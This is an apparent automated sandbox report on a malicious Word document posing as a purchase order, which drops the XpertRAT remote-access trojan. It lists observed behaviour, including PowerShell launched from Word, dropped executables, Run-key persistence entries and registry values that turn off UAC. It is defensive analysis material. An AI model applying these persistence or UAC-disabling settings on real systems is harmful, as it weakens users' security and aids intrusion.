Malware Analysis Report

2024-10-23 20:09

Sample ID 210920-nswswsdhf2
Target IMG_Order PO 094765 SMH.doc
SHA256 4a67cc05b5f45a774fafb1da0a0e8ac0f3839a0b520c0b2346bbeeace304aa77
Tags
xpertrat test evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a67cc05b5f45a774fafb1da0a0e8ac0f3839a0b520c0b2346bbeeace304aa77

Threat Level: Known bad

The file IMG_Order PO 094765 SMH.doc was found to be: Known bad.

Malicious Activity Summary

xpertrat test evasion persistence rat trojan

Process spawned unexpected child process

Windows security bypass

UAC bypass

XpertRAT Core Payload

XpertRAT

Executes dropped EXE

Downloads MZ/PE file

Blocklisted process makes network request

Adds policy Run key to start application

Loads dropped DLL

Windows security modification

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Checks processor information in registry

System policy modification

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Modifies registry class

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-20 11:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-20 11:40

Reported

2021-09-20 11:42

Platform

win7-en-20210916

Max time kernel

147s

Max time network

149s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_Order PO 094765 SMH.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

UAC bypass

evasion trojan

Windows security bypass

evasion trojan

XpertRAT

rat xpertrat

XpertRAT Core Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
